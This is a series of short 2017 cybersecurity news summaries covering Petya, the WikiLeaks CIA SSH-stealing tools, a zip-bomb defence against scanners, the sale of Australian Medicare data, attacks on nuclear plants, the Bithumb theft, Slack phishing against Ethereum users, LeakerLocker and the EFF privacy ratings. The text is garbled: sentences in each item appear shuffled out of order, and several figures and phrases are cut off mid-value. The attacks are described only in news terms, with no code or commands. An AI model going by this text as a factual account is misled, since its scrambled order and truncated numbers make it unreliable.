Ukraine cyber police seize servers at centre of ‘Petya’ outbreak as ‘new activity’ detected :
The company has been the focus of intense attention from authorities and cybersecurity researchers since it was identified as the patient zero of the outbreak, which crippled computers at several multinational firms and knocked out cash machines, petrol stations and bank branches in Ukraine. Law firm DLA Piper said late Sunday that it has restored its email service and was working to bring its other networks back online. Ukraine’s national cybercrime unit seized servers belonging to a small company at the centre of a global outbreak of malicious software after “new activity” was detected there, the service said in a statement early on Wednesday (5 July. Russian companies were reportedly affected as well; Russian state-owned oil giant Rosneft said Monday it had taken the company six days to fully repair its computer systems after they were badly hit in the cyberattack. “Today is the first day of full-time work, “she said in a Facebook message Monday. Ukrainian authorities have blamed Russia for masterminding the outbreak, although several independent experts say it’s too early, based on what’s publicly known, to come to any firm conclusions. It then called allegations it had seeded the outbreak “clearly erroneous” but later said it was cooperating with authorities. Hanna Rybalka, who works at the state-owned Oschadbank ‘s headquarters in Kiev, said that business had taken nearly a week to recover. Adding to the intrigue, the bitcoin wallet linked to the hackers who masterminded the outbreak was emptied around the same time as the police announcement. Doc has given various explanations for its role in the outbreak.
WikiLeaks new dump reveals CIA malware BothanSpy and Gyrfalcon targeting Windows and Linux :
According to WikiLeaks, the malware implant targets the XShell program on Windows to steal user credentials, such as username, password, file name of private SSH key and key password, for all active SSH sessions. “BothanSpy can exfiltrate the stolen credentials to a CIA-controlled server (so the implant never touches the disk on the target system) or save it in an enrypted file for later exfiltration by other means, “WikiLeaks said. According to WikiLeaks, while BothanSpy targets Windows computers, Gyrfalcon goes after Linux platforms. WikiLeaks says that Gyrfalcon targets Linux platforms, including centos, debian, rhel, suse and ubuntu. WikiLeaks has dumped its newest Vault 7 documents, detailing the capabilities of two alleged CIA hacking tools dubbed BothanSpy and Gyrfalcon. The malware payloads have allegedly been designed to steal SSH credentials from systems running both Windows and Linux operating systems (OS. “The implant can not only steal user credentials of active SSH sessions, but is also capable of collecting full or partial OpenSSH session traffic. The malware is allegedly installed and configured via a rootkit developed by the spy agency. In other words, the two alleged CIA malware strains would allow spies to remotely hack into systems, likely without being detected. The previous data dumps have detailed all the different alleged hacking tools the spy agency used to hack into various OS and devices, giving a glimpse of the CIA’s pervasive tech powers.
Here’s how to protect your website from hackers – create a Zip file ‘bomb’ :
Hackers commonly use web vulnerability scanners to discover vulnerable websites. These scanners are programmed to poke away at websites, going through a list of popular known security vulnerabilities, until it finds one that the website’s owners haven’t patched against. Hackers commonly use web vulnerability scanners to discover vulnerable websites. gzip file, and you implement a PHP script he has written, then every time a vulnerability scanner starts in on your website, you can “bomb ” it by causing the scanner to freeze up. Independent security researcher Christian Haschek has come up with an idea to stop hackers in their tracks, especially if your website is built on WordPress – which has a huge number of security flaws. Of course, the best way to do this is to make sure that your website and servers are constantly updated with the latest software patches as soon as new security vulnerabilities are discovered. You can download a 42KB file that someone else has made here, but don ‘t open it, or your PC hard drives will run out of space, since once extracted, the true file size is actually 4. Hackers keep getting smarter, and it’s commonplace for companies and organisations to have their websites taken offline or hacked into to steal sensitive customer financial information. However, there’s always a chance you might miss one, or that attackers might figure out security vulnerabilities the good guys haven ‘t yet discovered and use them to their advantage. Haschek tested the script and found that it had the ability to cause Google Chrome, Edge, Internet Explorer 11, Nikto and SQLMap to crash, which seems a fitting retribution to hackers.
Hackers are selling healthcare details of ‘any Australian citizen’ on dark web for £17 each :
Paul Power an IT specialist said that if a hacker has access to a citizen ‘s name, date of birth and Medicare card number then they could potentially also log into My Health Record, a centralised repository of patient data, before holding a victim to ransom. The department takes every precaution to protect the sensitive information of Australians, and to safeguard the payments we make on behalf of the Australian government. Guardian Australia found that the hacker was claiming to be able to access the Medicare details of any Australian citizen for 0.”Alan Tudge, the human services minister responsible for matters of healthcare, attempted to play down the danger of the incident by telling media outlets that it would be “fear-mongering ” to suggest that full citizen health records could be obtained with a Medicare card number alone. It is believed the underground vendor has sold at least 75 Medicare files since October 2016, according to an investigation by Guardian Australia ,which verified the hackers ‘ claims by requesting a portion of its own journalist ‘s information. “The revelation that Australians ‘ Medicare identities are available for purchase on the dark web is incomprehensible, “the pair said. A hacker on the dark web is reportedly selling access to individual records hijacked from Australia’s healthcare system for as little as £17 ($22) each. A spokesperson for the Department of Human Services said the government is now working with security services to investigate the sale of alleged Medicare card records. The data, allegedly obtained via vulnerability in government computer networks, was listed under title the Medicare machine. In Australia, Medicare is a universal healthcare system managed by the Department of Human Services.
Nuclear hack: US nuclear power plants are now being targeted by hackers :
The New York Times reported that one of the companies targeted by the hackers was Wolf Creek Nuclear Operating Corporation, which operates a nuclear power plant in Kansas. Hackers have reportedly been targeting computer networks of companies that operate nuclear power plants, manufacturing facilities, as well as other energy firms across the US and other countries. Over the past few years, cybercriminals have developed customised malware variants such as Industroyer and Irongate, which specifically target nuclear control systems. The hackers reportedly sent malware-laced Word attachments, as part of email messages, to senior industrial control engineers, in an attempt to steal credentials and gain access to systems. The Times reported that the people targeted by the hackers were industrial control engineers, who have direct access to systems, that when disrupted could lead to explosions, spillage of hazardous material or fire, two unspecified sources told the publication. Authorities investigating the matter have yet to reportedly identify the malware used by the hackers in the cyberattacks. Nuclear and energy plants have recently come under threat from hackers. Hackers also reportedly employed waterhole and MITM (man in the middle) attacks in order to lure victims. Wolf Creeks officials reportedly said that none of their operating systems were affected and that their corporate network was different from the one used to run the plant. The escalated threat means that companies running nuclear and energy plants are now under pressure to ramp up security measures.
Hackers steal ‘billions’ from huge South Korean ethereum and bitcoin exchange :
An internet watchdog in South Korea is probing a cyberattack against Bithumb, one of the country’s dominant cryptocurrency exchanges, after data relating to more than 30,000 users was exposed and more than a billion won, the local currency, allegedly drained from accounts. In April this year, another South Korean cryptocurrency exchange called Yapizon lost what equated to millions of US dollars after hackers were able to infiltrate its computer network and steal more than 3,800 bitcoin from users. According to BraveNewCoin, Bithumb is the largest bitcoin and Ethereum exchange in South Korea, and one of the five largest bitcoin exchanges in the world. In this case, one victim told cryptocurrency outlet BraveNewCoin that an attacker “posed as an executive at Bithumb” via a phonecall to claim the firm found suspicious foreign activity on an account. The hackers reportedly used ‘voice phishing’ (vishing) tactics to gain full entry to accounts. Tech website Motherboard pointed towards Naver, South Korea’s version of Reddit, which featured updates from furious Bithumb members complaining about losing digital currency after the cyberattack. It is currently one of the biggest ethereum exchanges in the country by volume, reportedly accounting for more than 44% of South Korea’s overall trading in that form of currency alone. The state-run Korea Internet and Security Agency (KISA) was first contacted by Bithumb on 30 June to report that personal data had leaked from its systems after an employee’s home PC was hacked. The firm claimed the number of impacted customers was roughly 3% of its userbase. One alleged victim there claimed 7,100,000 won (£4,770, $6,000) was drained from an account.
Terrorists can get their hands on WMDs via tech available on Dark Web – UN :
Izumi Nakamitsu, the head of the UN’s Disarmament Affairs, said tech products such as 3D printers and drones, readily available for purchase in dark web marketplaces, could make it easier for terrorists to gain access to WMDs. The UN has warned of the risks of terrorists potentially being able to gain access to WMDs (weapons of mass destruction) by getting their hands on advanced technologies available on the dark web. She highlighted how 3D printers as well as drones could be exploited by terrorists to create or access WMDs. “The possibility of non-state actors, including terrorists, acquiring weapons of mass destruction remains a significant threat to global security, and the international community must step up its efforts to ensure that the disastrous scenario of WMD terrorism is avoided,” Nakamitsu said. Underground marketplaces, which include invite-only exclusive forums as well as the less discerning hubs, are rife with stolen and/or illegal goods, ranging for actual to cyber weapons. In a separate report, the UN also revealed how the dark web has become a thriving place for drug trafficking. In three years, between 2013 -2016, dark web drug transactions increased by nearly 50% annually. Drones could also potentially be used to deliver weapons undetected. The dark web is a hotbed of activity, not just for cybercriminals but also for various kinds of malicious entities. 3D printers have already been used to develop guns and other kinds of weapons such as plastic knives and even grenade launchers.
Ethereum under siege: Scammers make $700,000 in 6 days from Slack and Reddit phishing attacks :
If the user clicks the hyperlink in the Slack message, they are taken to a malicious website impersonating the wallet service, and if they try to login, their details will be harvested by the cybercriminals, who then log into the victims ‘ actual accounts and steal their funds. Instead of using forums, many mining pools, wallet services and information sites now host chatrooms using the customisable cloud-based chat messaging software Slack. So far, $682,000 has been stolen since 7 July due to malicious phishing messages sent over Slack, as well as from malicious private messages sent to users on Reddit. The malicious messages claim that the MyEtherWallet service has been hacked, and users are advised to log into their wallet and check their balance to see if they have lost any money. Cybercriminals are capitalising on these Slack communities by infiltrating them and impersonating the software’s official chatbot Slackbot to send fake custom messages from administrators to all members of a Slack team. MyEtherWallet has not been hacked There has never been any danger of MyEtherWallet being compromised, and the service’s core developers want users to start being more aware of scammers. com is the official site, and fake MyEtherWallet phishing sites are using other domains hosted in Russia to pull off the scams. Tens of thousands at risk Over 100 Slack communities are currently known to have been hit by the malicious phishing messages and tens of thousands of users in both the ETH and ETC forks are at risk. Nothing is actually at risk because the service does not store any user information and has not been compromised in any way, “the core developers qouted. Slack has multiple channels, so developers of the wallets and mining pools can chat in private channels, while also supporting public channels.
New Android malware will leak your private photos to friends unless you pay up :
Thousands of Android users may be at risk to a newly discovered form of malware which attempts to extort victims by threatening to leak a trove of personal information including photos, website histories and text messages unless a ‘ransom ‘ is paid to the hackers. When launched for the first time, the fake booster app – advertised as a way of speeding up a device – appears to be legitimate however its covert activity quickly kicks into gear by locking down the victim’s home screen with an overlay page displaying the ransom note. What to do if you’re hit by ransomware the experts concluded: “We advise users of infected devices to not pay the ransom. “Unlike most ransomware variants, the target here is the victim’s reputation rather than their files,” experts wrote in a blog post at the time. It’s a departure from the traditional approach of mobile ransomware, which typically keeps sensitive files cloaked via strong encryption until a fee is paid. Taking Booster & Cleaner Pro as an example, McAfee experts Fernando Ruiz and ZePeng Chen explained in their analysis that the malicious payload is only able to work if the victim permits a slew of heightened permissions upon installation. It has the capability of displaying private information (because the victim unwittingly granted it access) in the background. The hackers may be scammers due to the fact “not all the private data ” the malware claimed to access was actually read, the experts said. Dubbed ‘LeakerLocker ‘ by experts from cybersecurity firm McAfee, it demands $50 (£39) per victim to prevent the release of potentially sensitive data, which also includes Facebook chats, GPS locations and email correspondence, to the device’s stored contact list. Upon infection, a ‘ransom ‘ note warns: “In less than 72 hours this data will be sent to every person.
Who has your back? How tech firms rank at protecting your privacy against government surveillance :
While just a handful of tech companies were able to achieve a perfect five-star rating, telecommunications companies such as Comcast, AT&T, T-Mobile and Verizon rated poorly. ” Meanwhile, major telecommunications companies — AT&T, Comcast, T-Mobile, and Verizon — were the lowest-rated firms with just one star each for following industry standards for privacy. The Electronic Frontier Foundation (EFF) has released its annual “Who has your back” report for 2017 on Monday (10 July) that gauges just how well tech giants protect sensitive user data against government surveillance and intervention. These included following industry-wide best practices, informing users about government data requests, promising not to sell out users, standing up to National Security Letter (NSL) gag orders and their support for reforming the National Security Agency’s (NSA) Section 702 surveillance programme. The EFF evaluated 26 major tech companies based on how well they lived up to expectations and adopted best practices to protect their users’ information when government agencies seek data. “The tech industry as a whole has moved toward providing its users with more transparency, but telecommunications companies — which serve as the pipeline for communications and Internet service for millions of Americans — are failing to publicly push back against government overreach,” EFF Senior Staff Attorney Nate Cardozo said in a statement. The advocacy group used five categories to gauge the tech firms’ public policies and how well they stand up for user privacy. “While both companies have done significant work to defend user privacy — EFF especially lauds WhatsApp’s move to adopt end-to-end encryption by default for its billion users around the world —their policies still lag behind,” the EFF wrote. Tech giants Google, Microsoft, Facebook and LinkedIn lost out on one star each for failing to stand up to NSL gag orders. According to the EFF only nine companies managed to get gold stars in all five categories this year: Adobe, Credo, Dropbox, Lyft, Pinterest, Sonic, Uber, Wickr and WordPress.